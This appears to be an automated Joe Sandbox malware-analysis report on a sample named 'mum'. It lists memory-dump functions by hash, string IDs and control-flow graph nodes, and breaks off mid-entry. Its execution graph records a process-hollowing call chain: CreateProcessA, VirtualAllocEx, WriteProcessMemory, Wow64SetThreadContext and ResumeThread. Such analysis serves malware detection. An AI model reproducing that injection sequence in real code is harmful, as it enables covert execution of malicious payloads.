                                      • Opcode ID: 7ea2e938cb5b0ac138bc68ba5cf047d42b82952f38099675c07a4f6deda9ce31
                                      • Instruction ID: b0871400e81c65e95e870ee6db5ff4b4621e80bcc769a88f0d244127603c7f3b
                                      • Opcode Fuzzy Hash: 7ea2e938cb5b0ac138bc68ba5cf047d42b82952f38099675c07a4f6deda9ce31
                                      • Instruction Fuzzy Hash: 0A210475B14248DFCB14DF24D884B26BB65FB88318F34C569E9094B246C37BD8A7CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1275732887.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_26d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
                                      • Instruction ID: b232496d96a1d1200f7422c6c89cc5945a8d6502b11f86c663d7cabdab831b68
                                      • Opcode Fuzzy Hash: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
                                      • Instruction Fuzzy Hash: 2C119075A04284DFCB15CF14D5C4B15FF61FB84314F24C6A9D8094B656C33BD85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8162e0d684fa739037c6c05b1ac6c6760afb43865408a1ce151ad15b14d1b3b7
                                      • Instruction ID: be106b4297b648394b91b9ed051628f22268afd704c46836a187217add7feb81
                                      • Opcode Fuzzy Hash: 8162e0d684fa739037c6c05b1ac6c6760afb43865408a1ce151ad15b14d1b3b7
                                      • Instruction Fuzzy Hash: 5152CC74A01228CFDB64DF69C890BDDBBB2BB89304F1485EAD509A7354DB309E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d29687f8f1a0c044653f1b830bebba04522e590254b42c9461f36318d1cbe90d
                                      • Instruction ID: a86fc8abe6a06e02f9bce7f7368c964b2cc9f90e24c138ca5858832869620661
                                      • Opcode Fuzzy Hash: d29687f8f1a0c044653f1b830bebba04522e590254b42c9461f36318d1cbe90d
                                      • Instruction Fuzzy Hash: 37B1B474E00218CFCB54DFA9D894A9DBBB2FF89304F2181A9D919AB365DB30AD41CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b0f78734b5936fda779f449d78211a98da13986b53c229d29fbe828c613f0f2
                                      • Instruction ID: 371753c00d26b20ac0aa051b4328e8f6d3bbdb3b1e9709cc8841dec261ee89bc
                                      • Opcode Fuzzy Hash: 8b0f78734b5936fda779f449d78211a98da13986b53c229d29fbe828c613f0f2
                                      • Instruction Fuzzy Hash: CFA1AB74A05228DFDB64DF24C894BEAB7B2BB4A304F1085EAD50EA7350DB719E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c2d9f1a2ef74d17583baf31c14cf2b3a15987b2037e8581617cf71339c75e57e
                                      • Instruction ID: 3dd3fb4a05e64b48188a7356530c051dc85d2865b8ea1f849b8a106d5eb13a36
                                      • Opcode Fuzzy Hash: c2d9f1a2ef74d17583baf31c14cf2b3a15987b2037e8581617cf71339c75e57e
                                      • Instruction Fuzzy Hash: 6251C774E00648CFDB08DFAAD48499DFBF2BF89304F249169D809AB365EB309945CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1bf9d226f561faacaeeb826a339f61db046cb2ee9782a273f4a0f0886b477903
                                      • Instruction ID: 21f021182058fa152f26a17e59ba0043036ff6624b612b71b109e469239144be
                                      • Opcode Fuzzy Hash: 1bf9d226f561faacaeeb826a339f61db046cb2ee9782a273f4a0f0886b477903
                                      • Instruction Fuzzy Hash: DD51BF34A05228DFCB65DF24D894BAEB7B2BF4A304F5095EAD40AA7350CB719E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 650cfe9a2d5a6d16ec0db1dd82314afda288a5b48cdb6255de0cbd4e38361907
                                      • Instruction ID: 7ecbf6923fcad114f0ab133ad43c0b180b8ca3e2e3427eee24b152656df3b841
                                      • Opcode Fuzzy Hash: 650cfe9a2d5a6d16ec0db1dd82314afda288a5b48cdb6255de0cbd4e38361907
                                      • Instruction Fuzzy Hash: EAD09E78E1429CCBCF10DF65D8547ADB375BF46225F0075A6C10DA3A50D7305E509A16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:12.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:26
                                      Total number of Limit Nodes:0
                                      execution_graph 10945 f07270 10946 f072f7 CreateProcessA 10945->10946 10948 f07555 10946->10948 10957 f069e0 10958 f06a24 ResumeThread 10957->10958 10960 f06a76 10958->10960 10949 5359330 10950 5359345 10949->10950 10953 f06cf0 10950->10953 10954 f06d34 VirtualAllocEx 10953->10954 10956 f06db2 10954->10956 10965 5359400 10966 5359415 10965->10966 10970 f06b00 10966->10970 10974 f06af9 10966->10974 10967 535942b 10971 f06b49 Wow64SetThreadContext 10970->10971 10973 f06bc7 10971->10973 10973->10967 10975 f06b49 Wow64SetThreadContext 10974->10975 10977 f06bc7 10975->10977 10977->10967 10961 f06fd8 10962 f07024 ReadProcessMemory 10961->10962 10964 f070a2 10962->10964 10978 f06e48 10979 f06e94 WriteProcessMemory 10978->10979 10981 f06f33 10979->10981

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 272840-27284e 1 272850-272863 0->1 2 2728ae-2728f6 call 271590 0->2 5 272866-27287a 1->5 15 27292b-2729f1 2->15 16 2728f8-272900 2->16 9 272884-272887 5->9 10 27287c-272882 5->10 12 2728a6-2728ad 9->12 13 272889-2728a4 9->13 10->5 10->9 13->12 39 2729f8-272a1a 15->39 16->15 18 272902-27290f 16->18 18->15 19 272911-27291e 18->19 19->15 22 272920-27292a 19->22 40 272a21-272e52 call 2707f8 * 10 39->40 108 272e58-272e62 call 272f60 40->108 109 272e68-272e95 108->109 112 272e9c-272ea6 109->112 113 272eac-272f43 call 2707f8 * 2 112->113 129 272f48-272f4a 113->129 130 272f51-272f58 129->130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: 732dc28d4b53699a44e1db21d3259fc18b760bd3d9961767dd0813990814a613
                                      • Instruction ID: 193df516416d4f896f91269c5ec99233f60d423ea4c2bfb757ca8f64338f9a10
                                      • Opcode Fuzzy Hash: 732dc28d4b53699a44e1db21d3259fc18b760bd3d9961767dd0813990814a613
                                      • Instruction Fuzzy Hash: 9A228F30610614CFC754EF78C491A9EB7B2AF8A304F1584BDD90A9F369DB39AC46CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 353 276e30-276e5e 354 276e94-276ec3 353->354 357 277085-277091 354->357 358 276ec9-276ed5 354->358 376 277093-2770a1 357->376 377 2770ba-2770c7 357->377 359 276e60-276e63 358->359 360 276e65 359->360 361 276e6c-276e80 359->361 360->354 360->361 363 277066-27706b 360->363 364 276f65-276f6e 360->364 365 277043-277047 360->365 366 277002-27700c 360->366 367 277029-27703e 360->367 368 276fb7-276fbb 360->368 369 276ed7-276ede 360->369 370 277070-277084 360->370 371 27701f-277024 360->371 372 276fdf-276feb 360->372 373 27705a-27705e 360->373 374 276f19-276f1f 360->374 375 276ef9-276efd 360->375 361->357 395 276e86-276e92 361->395 363->359 364->357 380 276f74-276fa3 call 276008 364->380 386 277053-277058 365->386 387 277049 365->387 366->357 384 27700e-27701a 366->384 367->359 381 276fbd-276fc4 368->381 382 276fd8-276fdd 368->382 369->357 388 276ee4-276ef4 369->388 371->359 372->357 383 276ff1-276ffd 372->383 373->363 374->357 378 276f25-276f40 374->378 398 276f07-276f14 375->398 379 2770ca-2770d8 376->379 389 2770a3-2770b1 376->389 377->379 378->357 403 276f46-276f51 378->403 391 2770da-277104 379->391 380->357 408 276fa9-276fb2 380->408 381->357 393 276fca-276fce 381->393 382->372 394 276fd3 382->394 383->359 384->359 386->373 396 27704e 386->396 387->396 388->359 390 2770b3-2770b9 389->390 389->391 390->377 400 277106-277109 391->400 401 27713a-277143 391->401 393->394 394->359 395->359 396->359 398->359 404 277112-277126 400->404 405 27710b 400->405 406 277145-277151 401->406 407 2771af-2771b9 401->407 403->357 409 276f57-276f60 403->409 404->407 421 27712c-277138 404->421 405->401 405->404 410 277186-27718c 405->410 411 2771a5-2771aa 405->411 412 277153-27715f 405->412 413 277191-2771a4 405->413 414 277171-277176 405->414 415 27716f 405->415 416 277178-277184 405->416 406->400 425 2771e2-2771e5 407->425 426 2771bb-2771bd 407->426 408->359 409->359 410->400 411->400 418 277161 412->418 419 277168-27716d 412->419 414->400 415->414 416->400 422 277166 418->422 419->415 419->422 421->400 422->400 427 2771e6-2771ed 425->427 426->427 428 2771bf-2771c5 426->428 430 2771ee-2771f3 427->430 429 2771c7-2771cd 428->429 428->430 431 2771f6-2771fd 429->431 432 2771cf-2771d5 429->432 430->431 433 2771fe-27721b 431->433 432->433 434 2771d7-2771df 432->434 435 27723d-277243 433->435 434->425 436 277332-277337 435->436 437 277249-277252 435->437 438 27721d-277220 437->438 440 277222 438->440 441 277229-27723b 438->441 440->435 440->441 442 277295-27729d 440->442 443 277254-277263 440->443 444 2772a2-2772ba 440->444 445 277311-277325 440->445 446 2772cd-2772de 440->446 447 2772fa-2772fe 440->447 448 277328-27732d 440->448 441->438 442->438 450 277265-277269 443->450 451 27727a-277281 443->451 444->436 462 2772bc-2772c8 444->462 452 2772e5-2772e7 446->452 453 2772e0-2772e4 446->453 447->436 454 277300-27730c 447->454 448->438 450->436 455 27726f-277273 450->455 451->436 456 277287-277293 451->456 458 2772f3-2772f8 452->458 459 2772e9 452->459 453->452 454->438 461 277278 455->461 456->461 463 2772ee 458->463 459->463 461->438 462->438 463->438
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,/l$`!l$`!l
                                      • API String ID: 0-3429197752
                                      • Opcode ID: 5455166a1d2f248c078d6cf65c1914ae5a25a1f60b83c5a412714cea98958b63
                                      • Instruction ID: abd24c219614d6635a77d309fbce537b2128c50a2ebd0e5acea8517a2200b966
                                      • Opcode Fuzzy Hash: 5455166a1d2f248c078d6cf65c1914ae5a25a1f60b83c5a412714cea98958b63
                                      • Instruction Fuzzy Hash: 8FE1F170A2C655CFC7018F78C9556BABBB1FF45300F18C56BE4A99B292C374D861CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 464 27091a-270ad2 488 270ad4-270b0a 464->488 489 270b0c-270b0e 464->489 488->489 490 270b14-270b1e 489->490 491 270b10-270b12 489->491 493 270b20-270b36 490->493 491->493 495 270b3c-270b44 493->495 496 270b38-270b3a 493->496 497 270b46-270b4b 495->497 496->497 500 270b65-270b8e 497->500 501 270b4d-270b60 497->501 504 270b90-270b9c 500->504 505 270bc9-270bd3 500->505 501->500 504->505 508 270b9e-270bab 504->508 506 270bd5 505->506 507 270bdc-270c66 505->507 506->507 518 270caa-270cb8 507->518 519 270c68-270ca8 507->519 511 270bb1-270bc4 508->511 512 270bad-270baf 508->512 511->505 512->505 522 270cc3-270d10 518->522 519->522 540 270d13 call 271982 522->540 541 270d13 call 271a31 522->541 542 270d13 call 271990 522->542 526 270d19-270d98 538 270d9e call 2722a0 526->538 539 270d9e call 2722b0 526->539 530 270da4-270da6 531 270dd4-270df0 530->531 532 270da8-270dc4 530->532 535 270df2 531->535 536 270dfe 531->536 537 270dd0-270dd2 532->537 535->536 537->531 537->532 538->530 539->530 540->526 541->526 542->526
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl$48l
                                      • API String ID: 0-2888918871
                                      • Opcode ID: 807b37d98d3bc0565873ee0c29ace45144593259a248b47aa8fe791e52d65c3c
                                      • Instruction ID: 65c610728e61c00249036987dcc766616a38d1b8fd2e818f15c7b9beed7eed98
                                      • Opcode Fuzzy Hash: 807b37d98d3bc0565873ee0c29ace45144593259a248b47aa8fe791e52d65c3c
                                      • Instruction Fuzzy Hash: 82E18C35A10229CFDB14DF79D884AAEB7B2BF88305F11C529E405EB764DB34AD458F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 543 271ca2-271ce0 548 271ce2-271cf0 543->548 549 271cf1-271cf8 call 2718b0 543->549 552 271cfa-271d08 549->552 553 271d09-271d23 549->553 555 271e0e-271e81 call 276538 553->555 556 271d29-271d36 553->556 580 271e83 call 271ee1 555->580 581 271e83 call 271ef0 555->581 556->555 557 271d3c-271d46 556->557 557->555 559 271d4c-271d56 557->559 559->555 561 271d5c-271d76 559->561 563 271d79-271d97 561->563 563->555 564 271d99-271dbe 563->564 564->555 566 271dc0-271dd2 564->566 566->563 567 271dd4-271dd6 566->567 569 271dd9-271dde 567->569 569->555 570 271de0-271dea 569->570 570->569 571 271dec-271e0d 570->571 578 271e89-271e96 580->578 581->578
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.*=
                                      • API String ID: 0-954985398
                                      • Opcode ID: 8572d88f4142e0906dfdac2a01852d12e0ba82142327ce5dc8749d78e60d745f
                                      • Instruction ID: 52e5b844beee8af187df6d85a5bab3bc07ef0d424b17112e719c97bc4b09647b
                                      • Opcode Fuzzy Hash: 8572d88f4142e0906dfdac2a01852d12e0ba82142327ce5dc8749d78e60d745f
                                      • Instruction Fuzzy Hash: AF51C071B101098FCB14CB7DD8845AEBBB2EFC9315725817AD909D7755EB30EC618B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: fa436ce603c14b3323cb1def335a6e18e99dc89ad32e09602b2edb0643ed5fdb
                                      • Instruction ID: d8d37ea26939c2ec9873a3f81457f3079d0836527973c27666648e963f0c0389
                                      • Opcode Fuzzy Hash: fa436ce603c14b3323cb1def335a6e18e99dc89ad32e09602b2edb0643ed5fdb
                                      • Instruction Fuzzy Hash: F2910631A29A11CFCB208FA8D9592AAB7B1FF45301F24C47BD96ED7282D3748C64C715
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tl
                                      • API String ID: 0-379094156
                                      • Opcode ID: 0942ea02259a44dc1aee8592a4939fca22e06947d04120a441238972b34e970f
                                      • Instruction ID: 67694c3f3e25fdc21ffd818a7af28194a7704fbc1a9c4429dd8facc626fd501c
                                      • Opcode Fuzzy Hash: 0942ea02259a44dc1aee8592a4939fca22e06947d04120a441238972b34e970f
                                      • Instruction Fuzzy Hash: 22816C32B205159FD714DB69D880A9EB3E3AFC8724F1AC065E809DB765DB35DC11CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: f00350d54e273ef4fa0cabf3e3229ecc9536655d8b3dd626aadfd8eb3b590a3f
                                      • Instruction ID: f650161c4cc1f9318ac5d2c129e99783f155e0081730c73f4e650bac7b5b78ef
                                      • Opcode Fuzzy Hash: f00350d54e273ef4fa0cabf3e3229ecc9536655d8b3dd626aadfd8eb3b590a3f
                                      • Instruction Fuzzy Hash: 457119B8D5020EDFDF14CFAAD4859ADBBB1BF48300F20A659D416EB290DB31A955CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fbeb0c5145ed1076791e3d12e8450e5e41b54a19bc244ce666e48c686711c3b
                                      • Instruction ID: bedd1694e959dff0de0135cc5a6f771ec3e17d225f5ef792bbd5ba7bf7f0def4
                                      • Opcode Fuzzy Hash: 0fbeb0c5145ed1076791e3d12e8450e5e41b54a19bc244ce666e48c686711c3b
                                      • Instruction Fuzzy Hash: 17615C32F205259FD714DB69C880B9EB3E3AFC8714F2AC165E8199B765DA34DC11CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4adcaacc1353d8f75068065daaecfb66dcfcbbbb9d58d56dfc9948f9c9e4a6cc
                                      • Instruction ID: f5f745bd1f36c0a5c0cc58164d5be4dac8baf686161af10ea99a83a63fad5429
                                      • Opcode Fuzzy Hash: 4adcaacc1353d8f75068065daaecfb66dcfcbbbb9d58d56dfc9948f9c9e4a6cc
                                      • Instruction Fuzzy Hash: D721C7B1E046588BDB18CFABC81059EFBF7AFC9300F18C07A8458AB269DB705902CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 132 272938-2729f1 149 2729f8-272a1a 132->149 150 272a21-272e52 call 2707f8 * 10 149->150 218 272e58-272e62 call 272f60 150->218 219 272e68-272e95 218->219 222 272e9c-272ea6 219->222 223 272eac-272f43 call 2707f8 * 2 222->223 239 272f48-272f4a 223->239 240 272f51-272f58 239->240
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: 12bbb915eb2d013cbceab3a1c1278b87671ba68bbaddb2d8b30e93b5fc4b2160
                                      • Instruction ID: 4009a5bb1fa35ae152589c4284e61dfe908285dfd206191b15494c3fad24ac04
                                      • Opcode Fuzzy Hash: 12bbb915eb2d013cbceab3a1c1278b87671ba68bbaddb2d8b30e93b5fc4b2160
                                      • Instruction Fuzzy Hash: 96023E34610614CFCB54EF78C495A9EB7A6AF89304F1184BCD80AAF369DF39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 242 270114-272f58 call 2707f8 * 10 call 272f60 call 2707f8 * 2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: dee244ccda83d9057b225417520dc95b84a0f815e96a0942a9a3b74419080d9c
                                      • Instruction ID: 466e9d88e14b457e8f876f4256c26f0f5f65711e3c8c2165f4cf4a1d9ac774d5
                                      • Opcode Fuzzy Hash: dee244ccda83d9057b225417520dc95b84a0f815e96a0942a9a3b74419080d9c
                                      • Instruction Fuzzy Hash: 03023F34610614CFCB54EF78C495A9EB7A6AF89304F1184BCD80AAF369DF39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 582 272f60-2730a2 call 2707f8 * 2 607 2730a4-2730aa 582->607 608 2730ba-2730f4 call 2707f8 582->608 609 2730ae-2730b0 607->609 610 2730ac 607->610 609->608 610->608
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `!l$`!l
                                      • API String ID: 0-3986300676
                                      • Opcode ID: f8a939342b5105921535a911a270b5145b3a2e0b41efc835c76a8dab88f2469b
                                      • Instruction ID: ce3573d638cb73103e6cb245bd297b3464a4a5025a2957da2d154d55da7b1b8a
                                      • Opcode Fuzzy Hash: f8a939342b5105921535a911a270b5145b3a2e0b41efc835c76a8dab88f2469b
                                      • Instruction Fuzzy Hash: 2241CC347001148FC744EF78D855A6E7BF2AF8A300B2580A9E51ADB7A6DE30DC158BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 615 271750-27177c 619 27177e-271785 615->619 620 271788-271790 615->620 622 271792-271799 620->622 623 27179c-2717b6 620->623 625 2717bc-2717c9 623->625 626 271899 623->626 625->626 627 2717cf-2717d9 625->627 629 27189e-2718b3 call 2718c8 626->629 627->626 628 2717df-2717e9 627->628 628->626 630 2717ef-27180a 628->630 632 2718b9-2718bb 629->632 631 27180d-271825 630->631 631->626 633 271827-271853 631->633 634 2718c1-2718c7 632->634 635 2718bd-2718c0 632->635 633->626 636 271855-271866 633->636 636->631 637 271868-27186a 636->637 638 27186d-271872 637->638 638->626 639 271874-27187e 638->639 639->638 640 271880-271896 639->640
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.*=
                                      • API String ID: 0-954985398
                                      • Opcode ID: d0b8b8732eb2a7a9cf59730bc3fbe1ebaa9f27e1f1265aa8dce0e1ad2c34b10c
                                      • Instruction ID: cdcc2b8e9ce38351cf3df7745bd5dccc0670dfc7417ee2ba3eada27a4be576c5
                                      • Opcode Fuzzy Hash: d0b8b8732eb2a7a9cf59730bc3fbe1ebaa9f27e1f1265aa8dce0e1ad2c34b10c
                                      • Instruction Fuzzy Hash: FB418A71F1011A8BDB10DF99E8846AEBBBAFF84311B15C52AE518D7645D330E8618B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 642 275e48-275e68 643 275e8a-275eaf 642->643 646 275eb4-275ebe 643->646 647 275eb1 643->647 648 275ec7-275eca 646->648 649 275ec0-275ec5 646->649 647->646 650 275ecd-275edc 648->650 649->650 652 275e6a-275e6d 650->652 653 275e76-275e88 652->653 654 275e6f 652->654 653->652 654->643 654->653 655 275f82-275f88 654->655 656 275ede-275ef8 654->656 657 275f4c-275f55 654->657 658 275f0b-275f1a 654->658 659 275f58-275f5c 654->659 660 275f8c-275f98 655->660 661 275f8a 655->661 672 275fc5 656->672 673 275efe-275f06 656->673 657->659 682 275f1c call 2762a7 658->682 683 275f1c call 2761b8 658->683 663 275f5e-275f68 659->663 664 275f7b-275f80 659->664 666 275f9a-275fa5 660->666 661->666 669 275fca-275fcf 663->669 670 275f6a-275f71 663->670 664->655 665 275f76 664->665 665->652 678 275fa7-275fad 666->678 679 275fbd-275fc4 666->679 668 275f22-275f25 668->672 674 275f2b-275f35 668->674 670->665 672->669 673->652 674->669 677 275f3b-275f47 674->677 677->652 680 275fb1-275fb3 678->680 681 275faf 678->681 680->679 681->679 682->668 683->668
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l$48l
                                      • API String ID: 0-1341598364
                                      • Opcode ID: 1d324bffb7c5c22f94d68a2ec9990d9b0abfaef8d36745cba85edefdcde568a7
                                      • Instruction ID: 035b728fe19962acdf76effbd19903a8e9e3c3da352760112dfea1f7adbea68d
                                      • Opcode Fuzzy Hash: 1d324bffb7c5c22f94d68a2ec9990d9b0abfaef8d36745cba85edefdcde568a7
                                      • Instruction Fuzzy Hash: 0841D230A25626CFCB108FA8C84567EF6B5FB45750F64842AE10ADB690DBF49D208B92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 684 276008-27602c 685 276062-276067 684->685 686 27602e-276031 685->686 687 276033 686->687 688 27603a-27604e 686->688 687->685 687->688 689 276164-27616b 687->689 690 27611e-27612a 687->690 691 2760cc-2760dd 687->691 692 27610a-27610e 687->692 693 2760b9-2760c7 687->693 694 276069-276074 687->694 695 276098-2760a2 687->695 698 27617e-276186 688->698 706 276054-276060 688->706 689->698 702 27616d-276179 689->702 690->698 701 27612c-27614e 690->701 704 2760e4-2760e6 691->704 705 2760df-2760e3 691->705 697 276110-276119 692->697 692->698 693->686 699 276076 694->699 700 27607d-276084 694->700 695->698 703 2760a8-2760b4 695->703 697->686 707 27607b 699->707 700->698 709 27608a-276096 700->709 701->698 708 276150-276161 701->708 702->686 703->686 710 276103-276108 704->710 711 2760e8-2760ef 704->711 705->704 706->686 707->686 709->707 712 2760fe 710->712 711->698 714 2760f5-2760f9 711->714 712->686 714->712
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
